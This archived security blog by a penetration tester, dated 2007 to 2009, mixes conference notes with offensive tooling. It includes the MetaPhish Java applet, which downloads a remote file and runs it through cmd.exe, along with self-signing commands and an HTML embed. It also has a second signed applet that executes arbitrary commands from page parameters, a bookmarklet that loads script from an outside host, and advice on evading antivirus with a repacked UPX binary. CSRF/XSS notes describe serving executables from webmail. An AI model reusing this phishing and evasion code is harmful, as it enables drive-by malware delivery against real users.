>>> For a lot of people (not you) it's hard to care about such things. The
>>> inevitable ennui sets in: "oh, not another one", "that one is similar to
>>> one I found in 1992AD", "well, if you had good patch management that's
>>> the best you can do!", etc. etc.
>>>
>>> The magic is in finding each one of these things unique and special and
>>> worth of attention.
>>>
>> ... or, instead of being an exploit fetishist, one might try to design their
>> network in such a way that a compromise of your network devices is not fatal.
>> Same for PDF viewers, browsers, etc. and how you design your computer system.
>>
>> Sure, it's cool to write exploits -- that always impresses people. We also do
>> that at ITL. E.g. we will be showing a couple of VM escape exploits during our
>> upcoming virtualization training (and we really are excited about those
>> exploits!), but the whole point is to illustrate how a good design (in that
>> particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can
>> mitigate a problem of exploits, even if we cannot find and patch them all.
>>
>> I think one should not forget that an exploit, no matter how cool, is only an
>> illustration of a problem. The actual solutions often have nothing to do with
>> how exploits are written. Do you really think VT-d designers were heap-overflow
>> ninjas? I doubt.
>>
>> joanna.
>>
>>
>>_______________________________________________
>> Dailydave mailing list
>> Dailydave@lists.immunitysec.com
>> http://lists.immunitysec.com/mailman/listinfo/dailydave
>>
>>

MetaPhish - Pentest Summit 2009

2009-06-19T09:20:00.004-04:00

These guys did a cool presentation at the SANS pentest summit 09.

Val Smith (valsmith@attackresearch.com)
Colin Ames (amesc@attackresearch.com)
David Kerb (dkerb@attackresearch.com)

Here is some of the code from the presentation. Thanks guys!!!

import java.applet.Applet;
import java.io.*;
import java.net.*;
import java.io.IOException;
public class WebDispApp extends Applet {
public WebDispApp() { }
public void init() { downloadURL(); cmd();
} /* end public void init */
public void downloadURL() {
OutputStream out = null;
URLConnection conn = null;
InputStream in = null;
try {
String geturi = getParameter("URI");
URL url = new URL(geturi);
String localfile = getParameter("LOCALFILE");
out = new BufferedOutputStream(
new FileOutputStream(localfile));
conn = url.openConnection();
in = conn.getInputStream();
byte[] buffer = new byte[1024];
int numRead;
long numWritten = 0;
while ((numRead = in.read(buffer)) != -1) {
out.write(buffer, 0, numRead);
numWritten += numRead;
} /* end while */
} /* end try */
catch (Exception exception) {
exception.printStackTrace();
} /* end catch */
finally {
try {
if (in != null) {
in.close();
} /* end if */
if (out != null) {
out.close();
} /* end if */
} /* end try */
catch (IOException ioe) { }
} /* end finally */
} /* end public void downloadURL */
public void cmd() {
Process process;
try {
process =
Runtime.getRuntime().exec("cmd.exe /c c:\\met.exe");
} /* end try */
catch(IOException ioexception) { }
} /* end public void cmd */
} /* end public class */

keytool -genkey -alias signFiles -keystore msfkeystore -storepass msfstorepass -dname "cn=Company Name" -keypass msfkeypass

jarsigner -keystore msfkeystore -storepass msfstorepass -keypass msfkeypass -signedjar sWebDispApp.jar WebDispApp.jar signFiles

keytool -export -keystore msfkeystore -storepass msfstorepass -alias signFiles -file MetaPhishLLC.cer

keytool -import -alias company -file MetaPhishLLC.cer -keystore msfkeystore -storepass msfstorepass

<html>
<body>
<APPLET code="MetaPhish.class" archive="sMetaPhish.jar" width="1" height="1">
<PARAM NAME="URI" VALUE="http://127.0.0.1/calc.exe">
<PARAM NAME="LOCALFILE" VALUE="c:\\data.exe">
</APPLET>
</body>
</html>

AV Bypass - #metasploit list

2009-06-09T12:09:00.005-04:00

Q >>> is a way to apply the msfencode to a generic PE file?

HDM >>> Not yet - msfencode only works on small chunks of an assembler, what you are looking for is a full-blown packer, such as ASPack or UPX. A great way to bypass AV product detection is to use a standard packer (UPX is easy) and then manually tweak the binary in a hex editor (change the UPX0-3 section names, replace some of the instructions at the entry point with equivalent opcodes, etc).

I have used dsplit to understand AV signature before. It can be quite a pita though. I'll post some results using the HDM-UPX methodology.

As usual, 10X to HDM.

displaying code on blogger.com sites

2009-06-05T16:10:00.002-04:00

I've continually has issues posting code samples to blogger.

I knew everything had to be escaped and so forth, but laziness is a virtue when it comes to coding

This site is perfect for getting code in a format that looks good on blogger sites.

http://www.elliotswan.com/postable

Thank goodness for laziness.

penetration testing OFX servers, part II

2009-06-05T15:06:00.007-04:00

I'm finally caught up on report writing. I've had back yo back tests scheduled since the beginning of the year. It's nice to have a couple weeks without people asking me when they can see a preliminary version of a report I'm writing up and so forth...

So after about a minute of looking at https traffic with wireshark, I knew it was time to either hook some browser calls with immunity debugger, or even better, take a look at oSpy. From the website "oSpy is a tool which aids in reverse-engineering software running on the Windows platform".

It turns out oSpy already has built in hooking for send/recv calls in the right places to see https calls from a local browser in clear text.

So it became fairly easy to understand exactly how this particular OFX service linked to see xml data formatted.

OFX services are like WSDL-less web services. The OFX server registers with intuit or microsoft and publishes a request format that the client has to use to request the specific data format that further requests must be formatted in.

It's kind of an anonymous bind that returns a schema with instructions on how to perform an authenticated request. I guess this might be due to the age of the specification that allows a relatively closed architecture around specific schema's for data transmission.

This is what I ended up using along with burp intruder to fuzz the unfriendly service.

import httplib
import re

PROXYHOST = "proxy.webmonyz.net"
PROXYPORT = 8080

URL = "https://www.ofxserver.com:443/web/default.ofx"
HOST = URL.split('/')[2]

regex = re.compile('<\w >\w ')

headers = {"Content-type": "application/x-ofx","Accept": "*/*","Host": "ofx.ofxserver.com"}
data = """\
OFXHEADER:100
DATA:OFXSGML
VERSION:102
SECURITY:NONE
ENCODING:USASCII
CHARSET:1389
COMPRESSION:NONE
OLDFILEUID:NONE
NEWFILEUID:NONE

<OFX>
<SIGNONMSG>
<SONRQ>
<CLIENT>20080414141414.123[-4:EDT]
<USERID>anonymous
<PASS>anonymous
<GENKEY>N
<LANGUAGE>ENG
<FI>
<ORG>WEBMONYZ
<FID>4141
</FI>
<APPID>OLS
<APPVER>2600
</SONRQ>
</SIGNONMSG>
<PROFMSG>
<PROFTRNRQ>
<TRNUID>41E2E2B0-4E61-1320-C2C8-CE72D5B69086
<PROFRQ>
<CLIENTROUTING>MSGSET
<DTPROFUP>41414101
</PROFRQ>
</PROFTRNRQ>
</PROFMSG>
</OFX>

"""
if len(PROXYHOST) > 3:
conn = httplib.HTTPConnection(PROXYHOST, PROXYPORT)
else:
conn = httplib.HTTPConnection(HOST)

conn.request("POST", URL, data, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()

n = regex.findall(data)
for c in n:
print c

conn.close()

penetration testing OFX servers

2009-05-13T21:57:00.003-04:00

I've done tests on a number of web services and like most rank and file testers there are always several issues identified.

Of course step 0 in testing a web servicee (within a 2 week window) is either discovering the WSDL or having it handed to you.

While OFX is an open standard, the implementation remains somewhat shrouded in secrecy. I'm not exactly sure why at this point, but I'm finding out more than I ever wanted about this specification.

Oh yeah...another interesting part of the journey has been finding out that common OFX clients, like microsoft money and quicken, generally fail safe when a certificate chain cannot be validated....which is good I guess. So it makes it harder to use burp or webscarab to reverse engineer the WSDL due to cert chain validation issues these tools introduce.

I have started looking at http flows from wireshark and using them as input for burp. I'm also writing some tools to automate some of this. I'm not looking forward to going through all this again when another OFX test comes up.

Stay tuned.

I'll be

quick diff to hydrogen

2009-04-22T15:08:00.006-04:00

this add's slightly less confusion for cross platform use...

--- client_interface.c 2008-06-12 14:27:04.000000000 -0400
+++ client_interface.new 2009-04-21 11:13:47.769102600 -0400
@@ -20,7 +20,7 @@
/*here are the functions that actually do the work*/
int com_get(), com_put(), com_command(), com_cwd(), com_setenv();
int com_help(), com_pf_otcp(), com_pf_itcp(), com_bg(),com_pf_oudp();
-int com_pf_iudp(),com_setwrap();
+int com_pf_iudp(),com_setwrap(),com_setunixshell(),com_setwinshell();
int com_setlistenip();

@@ -41,12 +41,15 @@
{ "?", com_help, "print some help information" },

/*some real commands*/
- { "cwd", com_cwd, "Change to directory DIR" },
- { "setenv", com_setenv, "Set an environment variable" },
- { "setwrap", com_setwrap, "Set the command wrapper (for windows)" },
- { "get", com_get, "get file" },
- { "put", com_put, "put file" },
- { "setlistenip", com_setlistenip, "set the local listening ip address"},
+{ "cwd", com_cwd, "Change to directory DIR" },
+{ "setenv", com_setenv, "Set an environment variable" },
+{ "setwrap", com_setwrap, "Set the command wrapper " },
+{ "setwinshell", com_setwinshell, "Set the command wrapper (for windows)" },
+{ "setunixshell", com_setunixshell, "Set the command wrapper (for unix)" },
+{ "get", com_get, "get file" },
+{ "put", com_put, "put file" },
+{ "setlistenip", com_setlistenip, "set the local listening ip address"},
+
{ "pf_otcp",com_pf_otcp,"portforward - set up an outbound tcp connection"},
{ "pf_itcp",com_pf_itcp,"portforward - set up an inbound tcp connection"},

@@ -361,6 +364,24 @@
return 1;
}

+ com_setwinshell()
+ {
+ char *wrapper;
+ wrapper="cmd.exe /c \"%s\"";
+ set_wrapformat(wrapper);
+ return 1;
+ }
+
+ com_setunixshell()
+ {
+ char *wrapper;
+ wrapper="sh -c \"( %s ) 2>&1\"";
+ set_wrapformat(wrapper);
+ return 1;
+ }
+
+
+
int
com_setenv(char * line)
{
@@ -525,7 +546,7 @@
char *line,*s;

/*the \r cleans up the first letter typed.*/
- line = readline ("\rCommand: ");
+ line = readline ("\rhydrogen> ");

if (!line)
return;

One from Dave's code attic - hydrogen

2009-04-21T12:10:00.005-04:00

Some of my best technical (and comical) inspirations come from the life works of Dave Aitel. If you want to learn about anything related to exploit development, exploit frameworks, post exploitation, or general application / network security, just start reading any of the code he has written.

And of course buy a copy of CANVAS to support his work. It's the best money you will ever spend on security training. Oh...and I guess you can use it as an exploit framework as well.

One of the really cool GPL projects Dave released a while back is called HYDROGEN. If you are not familiar with it, you can think of it as a cross platform meterpreter, with strong crypto built in.

It is really easy to add or change functionality. I'll try to post some of my mods to it soon.

My long term goal would be code in threading so that it could be compiled into a dll and injected into an exploited process on windows.

Even though RSnake says "Don't be like Dave" (in jest)...

Take some time to look around and read some of Dave's stuff...

Bookmarklets for Internet Explorer

2009-03-13T21:53:00.003-04:00

search links
linked images
linked pages
hide visited
int/ext links
open all links
target this window
target new windows
target new bg windows
target one new window
remove redirects
full urls as link text
frmget
toggle checkboxes
next option
allow no option
remove maxlength
enlarge textareas
show hiddens
undisable
character count
view passwords
htmlarea ie
zoom images in
zoom images out
zoom layout
view selection
sort table
number rows
transpose tables
bullets to numbers
number lines
zap plugins
zap colors
zap cheap effects
zap events
zap timers
zap images
printer friendly
zap presentational html
zap style sheets
zap cookies
restore context menu
restore selecting
remove redirects
lowercase
deleet
force wrap
trigger rollovers
ancestors
zap style sheets
zap presentational html
list classes
generated source
show blocks
topographic view
make link
named anchors
onerror status
onerror alert
validate html
netcraft
http headers
grayscale
check images
zap images
up
top
increment
decrement
go to referrer
back to first
domain owner
edit page
view cookies
transfer cookies
zap cookies
google translate
find links to squarefree
google backlinks
atw internal backlinks
atw external backlinks
atw plaintext backlinks
google site search: all
atw site search: all
number google hits
word frequency
linkify
query as link text
find links to squarefree
seek bar for IE
pause
rewind
fast-forward
rewind 5s
forward 5s
google
google site search
google site search: all
google site search: title
num=100
num=10
num=1
filter=0
@google
@alltheweb
@teoma
@msn
@altavista
wayback newest
wayback search

sourcing javascript from bookmarklet

2009-03-13T19:41:00.004-04:00

javascript:(function(){document.body.appendChild
(document.createElement('script')).src=
"hxxp://lab.googlepages.com/jash.js";})();

signing a jar file

2009-03-08T11:55:00.004-04:00

import java.applet.*;
import java.awt.*;
import java.io.*;
public class update extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try{
f = Runtime.getRuntime().exec(first);

}
catch(IOException e){
e.printStackTrace();
}
Process s;
String second = getParameter("second");
try{
s = Runtime.getRuntime().exec(second);
}
catch(IOException e){
e.printStackTrace();
}
Process t;
String third = getParameter("third");
try{
t = Runtime.getRuntime().exec(third);
}
catch(IOException e){
e.printStackTrace();
}
}
}

a. keytool -genkey -keystore myKeyStore -alias me
b. keytool -selfcert -keystore myKeyStore -alias me
c. jarsigner -keystore myKeyStore jarfile.jar me

convert any video to creative zen format

2009-03-04T14:02:00.002-05:00

I recently got a 16MB Creative Zen player. It has a really cool screen, long battery life, and accepts SD cards for additional storage. It's perfect for watching TV / Movies and Security Conference proceedings.

The problem is that there is no direct way to convert arbitrary video files to acceptable formats. The formats that the Zen likes are WMV and XVID.

Most of the conversion can be done with WinFF (free) using a simple one step process.

Converting a DVD to XVID takes two steps:

1. Rip the DVD to disk using DVDShrink
2. Use WinFF to convert VOB to AVI (XVID)

Converting Real Media format to WMV/XVID only takes one step, but requires the use of a non-free product supporting Real formats. I like xlisoft converter software.

cybersecurity and the financial sector

2008-12-08T20:15:00.002-05:00

We have been witness to catastrophic global financial meltdown. Unfortunately for us who spend any time on the internet, recovery will not occur on internet time.

In the interim, plenty of "information workers"...errmm senior system administrators, distinguished network engineers as well as their MSCE brethren are being told they are no longer needed and have lost their jobs.

The result is that there are likely an order of magnitude more internet servers that are slated for decommissioning. The skeleton crew left over will eventually get to it(or not). However, abandoned systems are no long being monitored, or patched and likely will fall out of inventories as more cost cutting measures are implemented.

This is good news for cybercriminals. I'm predicting an upsurge in server attacks using vulnerabilities discovered over this last quarter of 2008. We could start seeing this as soon as second quarter 2009. It's likely happening right now.

Not sure what to do about it at this point

imaginary munitions

2008-12-05T19:00:00.001-05:00

I've been thinking a lot about weaponizing of code in it's various forms. Exploit frameworks, web malware, and spyware come to mind. It's been a while since the notion of computer code as a weapon / munition has been discussed outside private circles. My concern is that bad crypto and bad code is being passed off as useful to the general public. Well, maybe not bad code, but certainly incomplete code.

It was not too long ago that that strong crypto was considered a munition. The Clinton era clipper chip fiasco seemed to be the last overt attempt at controlling crypto and crypto key management.

Fast forward to 2008 and this seems almost a laughable proposition, the idea that a law could prevent free movement of ideas and moreover that in a democracy, a totalitarian cryptographic infrastructure could exist. These were the days when PKI was solving wold hunger, and the NIST bridge certificate authorities would broker all secure transactions globally. Cool stuff at the time.

While we don't have government key management, we have seen in practice the ability for the government to access any information it needs, encrypted or not. This is all based on Bruce comments from long ago that the crypto itself is the easy part, the implementation and use of crypto is very difficult to get right. So forensics teams can either find keys, or break a specific implementation to get to the data, rather than rely on some elaborate key escrow capability.

Cross site request forgery

2008-11-13T14:55:00.001-05:00

I recently wrote up a doc on CSRF and presented it to a group of colleagues. I presented it as a work in progress, bu tit was kind of all over the place.

I challenged everyone to think of CSRF as a new type of payload that gets delivered rather than an exploit or vulnerability that can easily be fixed.

I was challenged on my statement that in the presence of XSS on a given domain, CSRF payloads can never be fully mitigated.

its been a long week so far...

2008-09-17T22:19:00.002-04:00

This week has seen some serious troubles manifested in the financial markets. Additionally it has been one of the most surreal times in my recent neurochemical life.

I have had no electric for the past 96 hours. My wife and kids went to stay with my mother-in-law. Candles, flashlights, radios and ipods were about all I had. In fact I was just getting used to listening to audio archives from blackhat 2008.

The best talk so far was Billy Hoffman. A self described southern, fast talker, and excessive red bull drinker. This is at least 6 months worth of appsec research for me.
The best part was the description of last years talk eluding to a "dehydrate" function. Where javascript is represented as white space. He described it in the book he co-authored "ajax security".

autoinject.user.js

2007-08-17T14:59:00.000-04:00

defcon | 0x0F0002

2007-08-17T13:07:00.000-04:00

A guy from websense gave a cool talk on Ajax Honeypots. The basic idea is to set up ebay, myspace, etc accounts and what happens. Watch who trys to put iframes into your site, who tries to be your friend...that sort of thing. Intersting way to gain intelligence.

The speaker went on to describe an ebay auction he started to sell a (poorly drawn) picture of a bicycle. Immedially he got serveral bids, and once the aution closed, the highest bid was at $300. So he sent an email asking how the buyer wanted to pay for the picture. The buyer used some stall tactics over several emails, but indicated the picture was worth it and so forth. In the final email the bidder asked for bank routing information and other personal information so that a payment could be made to the sellers account.

Mark Tobias was at DC15 again. Man this guy is good. He is a laywer and expert in physical bypass techniques. He gave another public service anouncement to help accurtatly represent the state of insecurity of currently locks. He talked about all sorts of engineering and production issues with lock manufacuteres that leed to defects but are primarily the failure of imagination within the design groups of the manufactureures.

The pointed out the most important aspect of physical and cyber security. We have to remember the key does not open the lock. The key actuates a mechanism that opens the lock. There is always a way to actuate the gating mechanism without the key....

There was another demonstration of bumpkey-ing. If you have not heard of it, check out youtube. It is just another defect found in almost all classes of locks, that allow them to be opened by unskilled people.

Although I did no participate in any contests this year, DC15 had a lockpicking village with representation from all over, including toool.nl.

xs-snipers gave a presnetation called "bitting the hand that feeds me"
They talked about dns-pinning, classic CSRF...and then this way cool use of CSRF on well known web sites to anonymously host web badware.
who do you trust/DNS
browser restricitons/ssl cert/phishing filters/human trust
classic CSRF
GET /tranfer.do?toAcct=nate&amount=1

USE XSS create an invisabel iframe
array or usernames passwords
test for xss then execute an xss request that only works with auth creds, use the xss to ping you back....exponential xss
xss sniper.com

put file that you want tp serve on one of the mail servers,
domain switching
store the file on the mailserver, find xss in yahoo, send a link with your xssesd page to send from yahoo

gmail
signup
storing content on gmail, no exe, it uploads to gmail anyway...they have taken ownership of cmd.exe
get location for the get request (copy short cut)
find xss, create invisable iframe, serve exe from gmail

people trust yahoo
you can host warez on on gmail and yahoo

write a full blown applicaiton to take advantage to this

Flash - cossdamin.xml loadpolicy in flash7

create invidabel iframe xss and specify the exact request to make the cross domain request somewhere

uri handler abuse - problem handling double quotes
firefox://
uris interact in whatever they want...
you can activate these to to interact with the user and the app

cross browser scripting
firefox

cross applciation scripting - own aim via i.e., command injection

remote command execution
in ff, mailto: double encoded nulls mis handles when ie7 is installed

xss-sniper

-Commonly used terms thoughout the con
same origin policy/mpack/web2.0

defcon | 0x0F0002

2007-08-09T15:35:00.000-04:00

Thomas Holt had a great session on "The market for malware". Thomas has been helping law enforcement with his research into this community/culture and shared some of his findings. In the past there have been talks about the Russian hacker scene. This one was a lot more detailed talk on the entire vertical and underground economy that fuels all sorts of badware. He detailed various roles, rules and functions, from the coder teams, the sales agent/promoter, to the seller, to the user (badguy) to the victim. He detailed how data was sold and how the community has it's own norms and expectations. The work he has done

It starts in a public forum, individuals can post code the the forum moderator and they will test the code, the moderator then writes back if the software works. if it works as advertised people start buying it and posting there own reviews. Then they can get discounts and all sort of perks.
It reminds me of the (old?) IRC channels or the (definitely old) BBS systems where you get credits for uploading, that you can use for downloading,

The bad guys treat the best customers very very well. There was an advertisement for customers for a party at a castle with free Sony VAIOs, and the very top buyers and referrers got class C Mercedes.

"The Secrets of Malware" Valsmith and Delchi cDc/NSF from are both from offensivesecurity. Very cool site that takes malware samples from anyone, posts them in the forums, analyzes them and posts the analysis. So they talked about some trending data from questions they have been asking...like what type of packers are used the most (upx/pecompact/aspack/fsg/pepack). Or what type of compilers in order of prevalence (ms vc++, msvb, borland delphi). Then some more out of the box type questions came up...like what type of packer are the least frequently used (private-exe 1%, codesafe 1%, soft-defender 1%).

Delchi mentioned his goal is to have the intial analyis done and posted within 5 minutes of a malware sample upload. Seemed kind of ambitious, but he stepped through some of his process and the perl code he is using to drive the time to analysis down.

defcon | 0x0F0001

2007-08-03T22:20:00.000-04:00

A large number of us hear about a potential "undercover" reporter at the con without a press badge.

Kingpin presents hardware hacking freescale chips, and how he made the badge, with a programmable scrolling led pannel this year. It's always good to be reminded that it all starts with the hardware. and that cool stuff is being done with less than 16K of memory.

Bruce Schneier q&a session. I never turn down an opportunity to see Bruce. Among discussing the recent interview with the TSA chief he has been blogging about, he pointed out that everything we do in the information age outputs data, it's all over the place, we can't get rid of it easily. He said "data is the pollution of the information age". Everything we do in cyberspace outputs some form of data, it's all over the place, we can't get rid of it easily.

He wen on further to postulate that we will be judged in a few decades (as individuals in the industrial age are/were) on how we manage this new type of pollution.

In response to another question, Bruce again pointed out encryption strength doesn't matter. No one tries to crack the crypto, they attack the key management. The FBI cracks hushmail/pgp with keyloggers.

He also talked about this forensic company (I think it was accessdata) that FBI/CIA/etc contracts with that has an 80% chance of cracking any file they get as long as they get the hard drive along with it. The company compiles a dictionary from all the printable strings contained on the hard drive. Think of all the cr@p in pagefiles, slack space, things tagged onto the end of 3 year old word docs...that sort of thing. They mutate it and create a personalized dictionary attack...and it works most of the time.

Martyn Ruks @ mwr infosecurity Gave a really good presentation on mq series architecture and surface area open to exploit. In addition to presenting 2 new vulnerabilities, one of which appears to be a 0-day, he demonstrated several tools he wrote and mentioned he would be releasing core the python classes he wrote to research attacks on and enumerate MQ.

This year they Q&A breakout rooms....so after the talk, you could spend another hour asking questions with about 4 or 5 other people. It was great. T-Rob, a cool MQ guy who works for IBM (although not officially representing IBM) was there. He has this comment to add to some mainstream MQ user forums.

The takeaway beyond MQ, from this talk, is that there are minimal vulnerability assessment tools (and methodology for that matter) to assess the security of large enterprise middleware infrastructure. And when testing or reviewing reports of pentests that involve middleware, don't accept a clean nessus/iss/retina scan as sufficient and assume your secure.

Some of the things that come to mind are ldap, j2ee, appserver rpc protocols, as well as enterprise management systems protocols used to manage Symantec (ESM), IBM (tivoli) and others. All of these have been found vulnerable and the vendors have silently patched them with little notice.

defcon | 0x0F0000

2007-08-02T12:55:00.000-04:00

I arrive in fabulous Las Vegas, lots of cons here, but none more fitting than defcon.
A city based on a synthetic reality hosting a con about the synthetic-ness of reality.

It's being held at the Riviera this year, as it was last. I didn't go last year, so this was my first at the new venue. I had been going to Alexis Park since dc9 (it moved there around dc8). I found out why I like the Alexis Park better.

The camp defcon effect. For me at least 25% of the uniq-ness of the con was the fact that the entire hotel was defcon. We ate defcon, drank defcon, talked defcon, had defcon pool3 parties, slept defcon (ok no sleep), even had defcon ATM machines...we became defcon. That's missing at the Riviera.

DT says "evolve or die"...he has been good to us so far. I'll suspend dis-belief and give it a try.

neurochem, code and software security

2007-03-23T20:56:00.000-04:00

I've been thinking over a bunch of intertwined threads regarding the architecture of reality that is imposed on the dominant social fabric. This idea is extrapolated from several sources. The most well know is the work published by Larry Lessig on how code influences the architecture of cyberspace which in turn influences cyber "norms" and several other factors.

The relevance to the interactions of social/mental norms of software developers
based on their neurochemical based architecture of reality becomes important when that reality gets coded and is alive in cyberspace in the form of software, infrastructure and applications.

There is a mainstream cyber architecture that is evolving that we interact within the constraints of daily on the inter-web. Arguably these are driven primarily by commerce, but at the end of the day, can only reflect the interpretation of system requirements interpreted as the output of the individual coder's neurochmical /internal reality architecture.

So the resilience of software based systems has a ceiling based on development teams norms which is highly influecned by a few individuals naturally imposed limits in vision/architecture based on the current state of brain neurochemistry.

I need to think over some of this stuff but it comes down to this. Individuals that can reliably break systems (software and otherwise) are have wired themselves or are naturally wired to have an expanded view of the given system's architecture and are working outside the constraints of the norms and architecture of the system's designer's. Matt Blaze is a good example of this type of person.

metasploit and kismet on the nokia n800

2007-03-16T15:27:00.000-04:00

I've always been into embedded systems. My mindstorms rcx 1.0 runs forth, linksys wireless gear runs dd-wrt, I have an old IBM z50 workpad running NetBSD /hpcmips. I remember sitting though a talk @ defcon 9 running dsniff on it with an old orinoco card and this guy trying throwing x86 exploits at it.

The nokia n800 runs debian and is the latest in a series of projects for me. I'm definitely not the first to figure out that this is a very nice device for mobile work. HDM recognized David Maynor as one of the first to have published pictures of this.

Additionally the "old" nokia 770 was the originall platform that Dave Aitel sells a mobile version of CANVAS + a bunch of other automated tools. It's called silica and was a big hit at RSA2007. It has since been updated to use the N800.

Anyway...here are some of my pics.

Vista, bitlocker and a short history of domestic backdoors

2007-03-12T21:08:00.000-04:00

Ah....now Vista is mainstream. Sure, I've tried it for my 30 days. I never got the cool graphics and stuff though. I immediately forced it back to "classic" mode. None of my systems are fast enough to run it with the mac graphics.

All the blackhat 06 talks about Vista were actually pretty good in describing the security built into the development life cycle and the _attempt_ at over engineering the OS the way DEC had done two decades ago with OpenVMS. But that's a topic for another day.

So now we have built in disk encryption. There are laws about data privacy that waive public disclosure of lost laptops with personal information on them if the data is "encrypted". Seems reasonable. Of course the laws say nothing about key management. That's always the hard part.

Speaking of key management, I'm thinking there is very sophisticated type of key management built into bitlocker. But it's not for security...it's for government forensics.

Here are three examples of why smart money says we will find out about this in...ummm...10 years or so maybe.

Key management in Lotus Notes

Page 80 of this IBM RedBook has details
Info on the key itself

Key management in Windows
Flawed attempt at PUBLIC escrowed encryption key management (clipper chip)

A couple of thoughts come to mind after a quick perusal of those links:

No key escrow will ever be made public...NSA tried once, it failed...better to keep it a secret. Lesson learned.
Vista crypto is engineered with NSA key components, similar to earlier implementations but with even greater sophistication.
Law enforcement will deny the ability to crack Vista crypto and will continue to state publicly that the encryption keys were "found".

The NSA is the best of the best. I can't wait to find out how they did it this time.

mr_rodgers part II

2007-02-23T13:46:00.000-05:00

I finally got around to completing phase II of my citrix program neighborhood fuzzing script. Now it can submit requests as well as enumerate them. Phase 3 and 4 are to auto fuzz parameters that can be fuzzed then add a gui to it.

privacy of pocsag alerts

2007-02-13T21:24:00.000-05:00

This is a simple post. If you are still using pagers to transmit important data unencrypted...like information system status, you are at very high risk of data disclosure.

There is plenty of software for use with radio scanners. This post to RISKS, although quite old illustrates the extent of the problem.

breakpoint

2007-02-12T13:33:00.000-05:00

I get this book in the mail. It's by Richard A. Clarke and its called breakpoint. If I'm not in front of a computer terminal, pda or a cell phone...I'm usually reading. However I've only read about 6 novels in my life. I suppose it's kind of weird.

So this book is special in several respects. I'd read Against All Enemies, written by the same author, a few years back and thought it was pretty cool to get a first hand account of government action, reaction and inaction around that time. The book came from a special person that got it for me at a book signing, with a note from the author.

I had to read it. I'm not a good judge of good fiction, but this did not strike me as particularly well written. It did however well exceed the purpose of exposing aspects of the non-fictional world that I find of keen interest. Those aspects happen to be related to how fragile our computerized, pda and cellphone world are. And how that fragility is manifested by using the very infrastructure that allow us to live our lives as we do today, against itself.

I first heard this in the 90s from Peter Neumann at a USENIX con. The idea that the more fast and efficient networks get, the more risk there is that they can be used against themselves. As it turns out this applies to most everything from an information security standpoint.

Now I can say I've read about seven novels in my life....

stopping kernel timers in NT 6.x

2007-02-11T19:02:00.000-05:00

Someone comes up with this idea that you install copy Vista, with 30 days to activation. Then promptly install a kernel rootkit...eehhmmm device driver that stops the kernel timers. I figure the device driver HAS to have some form of malware in it. So I break out ida and here is what I see. You be the judge....

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
.text:00011000 ; Format : Portable executable for IBM PC (PE)
.text:00011000 ; Section 1. (virtual address 00001000)
.text:00011000 ; Virtual size : 000001A3 ( 419.)
.text:00011000 ; Section size in file : 00000200 ( 512.)
.text:00011000 ; Offset to raw data for section: 00000400
.text:00011000 ; Flags 68000020: Text Not pageable Executable Readable
.text:00011000 ; Alignment : 16 bytes ?
.text:00011000
.text:00011000 model flat
.text:00011000
.text:00011000 ; ---------------------------------------------------------------------------
.text:00011000
.text:00011000 ; Segment type: Pure code
.text:00011000 _text segment para public 'CODE' use32
.text:00011000 assume cs:_text
.text:00011000 ;org 11000h
.text:00011000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00011000 dd 0
.text:00011004 db 2 dup(0)
.text:00011006
.text:00011006 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00011006
.text:00011006 ; Attributes: bp-based frame
.text:00011006
.text:00011006 sub_11006 proc near ; CODE XREF: sub_11080+Bp
.text:00011006 ; sub_11080+23p
.text:00011006
.text:00011006 var_28 = byte ptr -28h
.text:00011006 var_C = dword ptr -0Ch
.text:00011006
.text:00011006 mov edi, edi
.text:00011008 push ebp
.text:00011009 mov ebp, esp
.text:0001100B sub esp, 28h
.text:0001100E push ebx
.text:0001100F push esi
.text:00011010 push edi
.text:00011011 lea eax, [ebp+var_28]
.text:00011014 push eax
.text:00011015 call ds:KeInitializeTimer
.text:0001101B mov esi, ds:KeSetTimer
.text:00011021 or ebx, 0FFFFFFFFh
.text:00011024 mov edi, ebx
.text:00011026 jmp short loc_1102E
.text:00011028 ; ---------------------------------------------------------------------------
.text:00011028
.text:00011028 loc_11028: ; CODE XREF: sub_11006+34j
.text:00011028 add edi, 0FFFFFFFFh
.text:0001102B adc ebx, 0FFFFFFFFh
.text:0001102E
.text:0001102E loc_1102E: ; CODE XREF: sub_11006+20j
.text:0001102E push 0
.text:00011030 push ebx
.text:00011031 push edi
.text:00011032 lea eax, [ebp+var_28]
.text:00011035 push eax
.text:00011036 call esi
.text:00011038 test al, al
.text:0001103A jz short loc_11028
.text:0001103C mov esi, [ebp+var_C]
.text:0001103F lea eax, [ebp+var_28]
.text:00011042 push eax
.text:00011043 call ds:KeCancelTimer
.text:00011049 jmp short loc_1104E
.text:0001104B ; ---------------------------------------------------------------------------
.text:0001104B
.text:0001104B loc_1104B: ; CODE XREF: sub_11006+4Bj
.text:0001104B sub esi, 10h
.text:0001104E
.text:0001104E loc_1104E: ; CODE XREF: sub_11006+43j
.text:0001104E cmp dword ptr [esi], 0
.text:00011051 jnz short loc_1104B
.text:00011053 pop edi
.text:00011054 lea eax, [esi+10h]
.text:00011057 pop esi
.text:00011058 pop ebx
.text:00011059 leave
.text:0001105A retn
.text:0001105A sub_11006 endp ; sp = 4
.text:0001105A
.text:0001105A ; ---------------------------------------------------------------------------
.text:0001105B align 8
.text:00011060
.text:00011060 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00011060
.text:00011060 ; Attributes: bp-based frame
.text:00011060
.text:00011060 sub_11060 proc near ; CODE XREF: sub_11080+55p
.text:00011060
.text:00011060 arg_4 = dword ptr 8
.text:00011060
.text:00011060 mov edi, edi
.text:00011062 push ebp
.text:00011063 mov ebp, esp
.text:00011065 mov eax, [ebp+arg_4]
.text:00011068 and eax, 0FFFh
.text:0001106D sub eax, 218h
.text:00011072 neg eax
.text:00011074 sbb eax, eax
.text:00011076 inc eax
.text:00011077 pop ebp
.text:00011078 retn 4
.text:00011078 sub_11060 endp
.text:00011078
.text:00011078 ; ---------------------------------------------------------------------------
.text:0001107B align 8
